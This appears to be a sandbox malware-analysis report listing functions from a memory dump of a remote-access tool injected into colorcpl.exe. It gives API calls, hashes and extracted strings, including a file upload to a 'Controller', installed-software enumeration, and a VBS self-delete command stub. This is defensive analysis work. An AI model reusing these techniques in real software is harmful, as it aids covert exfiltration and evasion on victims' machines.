                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02F91B43
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02F91B54
                                                          • WriteFile.KERNEL32(00000000,03002AAA,00000002,00000000,00000000), ref: 02F91B65
                                                          • WriteFile.KERNEL32(00000000,03002AAC,00000004,00000000,00000000), ref: 02F91B75
                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 02F91B85
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02F91B96
                                                          • WriteFile.KERNEL32(00000000,03002AB6,00000002,00000000,00000000), ref: 02F91BA7
                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 02F91BB7
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02F91BC7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Write$Create
                                                          • String ID: RIFF$WAVE$data$fmt
                                                          • API String ID: 1602526932-4212202414
                                                          • Opcode ID: b09f6ff882441504a25fc5c12366999c2fea808d9a38adfa2d33aff764a322fb
                                                          • Instruction ID: 156e723da60cb935123d708206756b8a14296f7f8d4a4b7538aeae82a28b766e
                                                          • Opcode Fuzzy Hash: b09f6ff882441504a25fc5c12366999c2fea808d9a38adfa2d33aff764a322fb
                                                          • Instruction Fuzzy Hash: E6414F726442087FE210DA51DD85FBBBFECEB85B54F40081AF644DA081D7A4E909DBB3
                                                          Function 02F972AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\colorcpl.exe,00000001,02F97688,C:\Windows\SysWOW64\colorcpl.exe,00000003,02F976B0,030052D8,02F97709), ref: 02F972BF
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F972C8
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 02F972DD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F972E0
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 02F972F1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F972F4
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 02F97305
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F97308
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 02F97319
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F9731C
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 02F9732D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F97330
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: C:\Windows\SysWOW64\colorcpl.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                          • API String ID: 1646373207-2523923970
                                                          • Opcode ID: a6b1a9d568206881f430891a41456d2ee8d4831b1ee2f2c1784259660e908c1a
                                                          • Instruction ID: 3390eb668d8141541d7e7fd7cc8938f43dec6b7c292ff1df935ed85e4887c4de
                                                          • Opcode Fuzzy Hash: a6b1a9d568206881f430891a41456d2ee8d4831b1ee2f2c1784259660e908c1a
                                                          • Instruction Fuzzy Hash: 24012CF1E9531AA6BF517B7BAC59D1BAE9D9E406D83010C27B712E2112EFB8D400CE70
                                                          Function 02FAC0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 02FAC0C7
                                                          • _memcmp.LIBVCRUNTIME ref: 02FAC0DF
                                                          • lstrlenW.KERNEL32(?), ref: 02FAC0F8
                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 02FAC133
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02FAC146
                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02FAC18A
                                                          • lstrcmpW.KERNEL32(?,?), ref: 02FAC1A5
                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 02FAC1BD
                                                          • _wcslen.LIBCMT ref: 02FAC1CC
                                                          • FindVolumeClose.KERNEL32(?), ref: 02FAC1EC
                                                          • GetLastError.KERNEL32 ref: 02FAC204
                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 02FAC231
                                                          • lstrcatW.KERNEL32(?,?), ref: 02FAC24A
                                                          • lstrcpyW.KERNEL32(?,?), ref: 02FAC259
                                                          • GetLastError.KERNEL32 ref: 02FAC261
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                          • String ID: ?
                                                          • API String ID: 3941738427-1684325040
                                                          • Opcode ID: c470407cc51c11993e8474c55a0d2fb8cd9f9cb629a2c3e53de294a248ef6a69
                                                          • Instruction ID: a0f17e45628cdebd07812fc629d436e837b9f3655a45ba82da2201ded779629c
                                                          • Opcode Fuzzy Hash: c470407cc51c11993e8474c55a0d2fb8cd9f9cb629a2c3e53de294a248ef6a69
                                                          • Instruction Fuzzy Hash: EF41C5B1E48305DBEB21DF64D858AABB7ECEB94784F00092BF641C6150E774C658CBA2
                                                          Function 02FDF4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                          • String ID:
                                                          • API String ID: 3899193279-0
                                                          • Opcode ID: 68a97259e96ccbedc29a6aba465108a7ac2ef7c1a5b75098665aad525dc8ec7c
                                                          • Instruction ID: f29adafd2e74aa634bd420586aed1efde0bfd2e799328209a84d7ec31cdf2892
                                                          • Opcode Fuzzy Hash: 68a97259e96ccbedc29a6aba465108a7ac2ef7c1a5b75098665aad525dc8ec7c
                                                          • Instruction Fuzzy Hash: 65D114B1D012046BDB35AF789C90FAA77ABAF013D8F0D476DEB46A7A80E73595018F50
                                                          Function 02FAC720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 02FAC742
                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02FAC786
                                                          • RegCloseKey.ADVAPI32(?), ref: 02FACA50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumOpen
                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                          • API String ID: 1332880857-3714951968
                                                          • Opcode ID: 26e0f1fe37615534b7e00599b7fc375a2baeb359655f372fce27cc6e8fd5b893
                                                          • Instruction ID: 10e87e6d532357b50d341108ef9804f19dc1be93a6fbcf7d7de8eef65c893d89
                                                          • Opcode Fuzzy Hash: 26e0f1fe37615534b7e00599b7fc375a2baeb359655f372fce27cc6e8fd5b893
                                                          • Instruction Fuzzy Hash: C28101715082459BE725EB60DC50EEFB7E9BF94384F50492EE78A82160FF30A949CF52
                                                          Function 02FAD620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 02FAD66B
                                                          • GetCursorPos.USER32(?), ref: 02FAD67A
                                                          • SetForegroundWindow.USER32(?), ref: 02FAD683
                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 02FAD69D
                                                          • Shell_NotifyIconA.SHELL32(00000002,03004B48), ref: 02FAD6EE
                                                          • ExitProcess.KERNEL32 ref: 02FAD6F6
                                                          • CreatePopupMenu.USER32 ref: 02FAD6FC
                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 02FAD711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                          • String ID: Close
                                                          • API String ID: 1657328048-3535843008
                                                          • Opcode ID: 3ebd8f41f43b8cdec92491b41e07d4bc84d2a5a7520373fe429bb4da1c88d89f
                                                          • Instruction ID: 5c860818b536c3d3af0db0326c425a10b17c25956e1bab91897794455c5e0c11
                                                          • Opcode Fuzzy Hash: 3ebd8f41f43b8cdec92491b41e07d4bc84d2a5a7520373fe429bb4da1c88d89f
                                                          • Instruction Fuzzy Hash: 452139B294010CEFDF1A9FA9ED1EAA97F39EF04385F004514F706995A1D7B19920DF24
                                                          Function 02FE1346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 02FE138A
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE059F
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE05B1
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE05C3
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE05D5
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE05E7
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE05F9
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE060B
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE061D
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE062F
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE0641
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE0653
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE0665
                                                            • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE0677
                                                          • _free.LIBCMT ref: 02FE137F
                                                            • Part of subcall function 02FD6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?), ref: 02FD6818
                                                            • Part of subcall function 02FD6802: GetLastError.KERNEL32(?,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?,?), ref: 02FD682A
                                                          • _free.LIBCMT ref: 02FE13A1
                                                          • _free.LIBCMT ref: 02FE13B6
                                                          • _free.LIBCMT ref: 02FE13C1
                                                          • _free.LIBCMT ref: 02FE13E3
                                                          • _free.LIBCMT ref: 02FE13F6
                                                          • _free.LIBCMT ref: 02FE1404
                                                          • _free.LIBCMT ref: 02FE140F
                                                          • _free.LIBCMT ref: 02FE1447
                                                          • _free.LIBCMT ref: 02FE144E
                                                          • _free.LIBCMT ref: 02FE146B
                                                          • _free.LIBCMT ref: 02FE1483
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: b7ac4c5754ed7a71d3221f8422c85e50c523b4023c0c978cf0dd69150d3982cb
                                                          • Instruction ID: 917c1e14b00980ae7d08b71d2d198145eca63ddd522f172ab02bd419d439912f
                                                          • Opcode Fuzzy Hash: b7ac4c5754ed7a71d3221f8422c85e50c523b4023c0c978cf0dd69150d3982cb
                                                          • Instruction Fuzzy Hash: 893164719003049FDF229A3AED45F5BB3EAAF01391F548929D65AD7690DF70AD409F20
                                                          Function 02F98BB5 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 02F98D1E
                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 02F98D56
                                                          • __aulldiv.LIBCMT ref: 02F98D88
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                            • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 02F98EAB
                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 02F98EC6
                                                          • CloseHandle.KERNEL32(00000000), ref: 02F98F9F
                                                          • CloseHandle.KERNEL32(00000000,00000052), ref: 02F98FE9
                                                          • CloseHandle.KERNEL32(00000000), ref: 02F99037
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                          • API String ID: 3086580692-2596673759
                                                          • Opcode ID: 6f9f9742f40d58fbf2db49fa28066a2201dbcd018bedeab4dd42b1aed27d4889
                                                          • Instruction ID: 812357f67b14a66104bd3188d5a13ccb59e21d15c149bd5c6c363a2c27b7339e
                                                          • Opcode Fuzzy Hash: 6f9f9742f40d58fbf2db49fa28066a2201dbcd018bedeab4dd42b1aed27d4889
                                                          • Instruction Fuzzy Hash: 58B1A0316083449FEB54FB24CC90B6FB7EAAF95394F40491DE68A47290EF719909CF52
                                                          Function 02FE0680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: bd8feffa2fc4f0093300b9b424e238ab6d2c9714c7ba87615236bfdc0a1c89d1
                                                          • Instruction ID: 54bfcd63b36b9a6fa818e6a2bc12facc74c70272a61de5c56d65a885c63c9de6
                                                          • Opcode Fuzzy Hash: bd8feffa2fc4f0093300b9b424e238ab6d2c9714c7ba87615236bfdc0a1c89d1
                                                          • Instruction Fuzzy Hash: D4C134B2D40214ABEF21DBA8CC42F9EB7FDAB14740F144165FB45FB281DAB09E419B54
                                                          Function 02FA2AEF Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 482sleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02FA2B08
                                                            • Part of subcall function 02FABA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,02FF6478,02F9D248,.vbs,?,?,?,?,?,030052F0), ref: 02FABA30
                                                            • Part of subcall function 02FA85A3: CloseHandle.KERNEL32(02F940F5,?,?,02F940F5,02FF5E84), ref: 02FA85B9
                                                            • Part of subcall function 02FA85A3: CloseHandle.KERNEL32(02FF5E84,?,?,02F940F5,02FF5E84), ref: 02FA85C2
                                                          • Sleep.KERNEL32(0000000A,02FF5E84), ref: 02FA2C5A
                                                          • Sleep.KERNEL32(0000000A,02FF5E84,02FF5E84), ref: 02FA2CFC
                                                          • Sleep.KERNEL32(0000000A,02FF5E84,02FF5E84,02FF5E84), ref: 02FA2D9E
                                                          • DeleteFileW.KERNEL32(00000000,02FF5E84,02FF5E84,02FF5E84), ref: 02FA2E00
                                                          • DeleteFileW.KERNEL32(00000000,02FF5E84,02FF5E84,02FF5E84), ref: 02FA2E37
                                                          • DeleteFileW.KERNEL32(00000000,02FF5E84,02FF5E84,02FF5E84), ref: 02FA2E73
                                                          • Sleep.KERNEL32(000001F4,02FF5E84,02FF5E84,02FF5E84), ref: 02FA2E8D
                                                          • Sleep.KERNEL32(00000064), ref: 02FA2ECF
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                          • String ID: /stext "
                                                          • API String ID: 1223786279-3856184850
                                                          • Opcode ID: 26237ab6bdfdc0aa371f0e9a0d3c001bcecf2919875030162a78f1e8f096c1a6
                                                          • Instruction ID: f75568a573801134937c9ae4db4ec7b1f61908977b29977ae13ac5ef0c845caf
                                                          • Opcode Fuzzy Hash: 26237ab6bdfdc0aa371f0e9a0d3c001bcecf2919875030162a78f1e8f096c1a6
                                                          • Instruction Fuzzy Hash: EB0234316083455AEB29FB60DCA0BEFB3E6AF94384F50492DD68A47190EF705A4DCE52
                                                          Function 02FA4BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 65535$udp
                                                          • API String ID: 0-1267037602
                                                          • Opcode ID: 2e818486c25de5a7d779a9879a6d215c1841de71701d1ec2149a22ac49dea310
                                                          • Instruction ID: d987c2068ce63660b382a7f6eae10b5d084b0e7d113cd228779416b1bb746d96
                                                          • Opcode Fuzzy Hash: 2e818486c25de5a7d779a9879a6d215c1841de71701d1ec2149a22ac49dea310
                                                          • Instruction Fuzzy Hash: E75117F2A45315ABD7648A14C924B7B77E8EF847C8F04082DFB8797750D7E4D840CA62
                                                          Function 02F9D83A Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02FA288B: TerminateProcess.KERNEL32(00000000,pth_unenc,02F9F903), ref: 02FA289B
                                                            • Part of subcall function 02FA288B: WaitForSingleObject.KERNEL32(000000FF), ref: 02FA28AE
                                                            • Part of subcall function 02FA3733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,030052F0), ref: 02FA374F
                                                            • Part of subcall function 02FA3733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 02FA3768
                                                            • Part of subcall function 02FA3733: RegCloseKey.KERNEL32(00000000), ref: 02FA3773
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 02F9D894
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,02FF6478,02FF6478,00000000), ref: 02F9D9F3
                                                          • ExitProcess.KERNEL32 ref: 02F9D9FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                          • API String ID: 1913171305-2411266221
                                                          • Opcode ID: 45944300ba0ff65bac8a07489858dd08ebb9bc72760cd6a2c5f7a424450b39a3
                                                          • Instruction ID: d86f05814569c893bb2aa466c97b3d7763eb897502f6ea0ca5ba1cd156f66a0f
                                                          • Opcode Fuzzy Hash: 45944300ba0ff65bac8a07489858dd08ebb9bc72760cd6a2c5f7a424450b39a3
                                                          • Instruction Fuzzy Hash: 4B411D719001199AFF15FBA4DC54DEFB77AAF61784F100169E70AA70A1FF205E4ACE90
                                                          Function 02FCA8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02F91D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02FCA912
                                                          • GetLastError.KERNEL32(?,?,02F91D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02FCA91F
                                                          • __dosmaperr.LIBCMT ref: 02FCA926
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02F91D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02FCA952
                                                          • GetLastError.KERNEL32(?,?,?,02F91D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02FCA95C
                                                          • __dosmaperr.LIBCMT ref: 02FCA963
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,02F91D55,?), ref: 02FCA9A6
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,02F91D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02FCA9B0
                                                          • __dosmaperr.LIBCMT ref: 02FCA9B7
                                                          • _free.LIBCMT ref: 02FCA9C3
                                                          • _free.LIBCMT ref: 02FCA9CA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                          • String ID:
                                                          • API String ID: 2441525078-0
                                                          • Opcode ID: cb51fd4cd0ab0e88ae17ff8d32e81072d52518d8a83dfe1514026e278c4882e9
                                                          • Instruction ID: 9b4a7933fc8971485a56fcfeebfe41471be51ea84043aa1238605b8395be34c1
                                                          • Opcode Fuzzy Hash: cb51fd4cd0ab0e88ae17ff8d32e81072d52518d8a83dfe1514026e278c4882e9
                                                          • Instruction Fuzzy Hash: F731DF72D0420FAFDF15AFA4DC45DAE7B7EAF053A4B24411DFA2096290DB30D950CBA0
                                                          Function 02F954A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 02F954BF
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02F9556F
                                                          • TranslateMessage.USER32(?), ref: 02F9557E
                                                          • DispatchMessageA.USER32(?), ref: 02F95589
                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,03004F78), ref: 02F95641
                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 02F95679
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                          • API String ID: 2956720200-749203953
                                                          • Opcode ID: 0353e37e3496a1447bcb71b11d66b51ea9e53ecbab52741b87f7268078b68e00
                                                          • Instruction ID: fd02175196b18f66ca9d8bb5d984f8d52af4add25bd939e562cc36382ebd084e
                                                          • Opcode Fuzzy Hash: 0353e37e3496a1447bcb71b11d66b51ea9e53ecbab52741b87f7268078b68e00
                                                          • Instruction Fuzzy Hash: FF41D272A04201ABEF11FB74CC5896F77AEAB85784F40092CF75697294EF348905CF92
                                                          Function 02FA330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 02FA3452
                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 02FA3460
                                                          • GetFileSize.KERNEL32(?,00000000), ref: 02FA346D
                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 02FA348D
                                                          • CloseHandle.KERNEL32(00000000), ref: 02FA349A
                                                          • CloseHandle.KERNEL32(?), ref: 02FA34A0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                          • String ID:
                                                          • API String ID: 297527592-0
                                                          • Opcode ID: 61fffd6ca1e2f67873e719f6d38460d17d0b6709d38284d2bcbf11c67d16d6ea
                                                          • Instruction ID: b23b3dd3ada082349e3cd247fcf22d796fa9f3d49b3fe714b96b9a1fd991b1d1
                                                          • Opcode Fuzzy Hash: 61fffd6ca1e2f67873e719f6d38460d17d0b6709d38284d2bcbf11c67d16d6ea
                                                          • Instruction Fuzzy Hash: C541EFB2A08305BFEB11AB25ED49F2B7BADEFC57A8F10091DF745D6090DB7485008B62
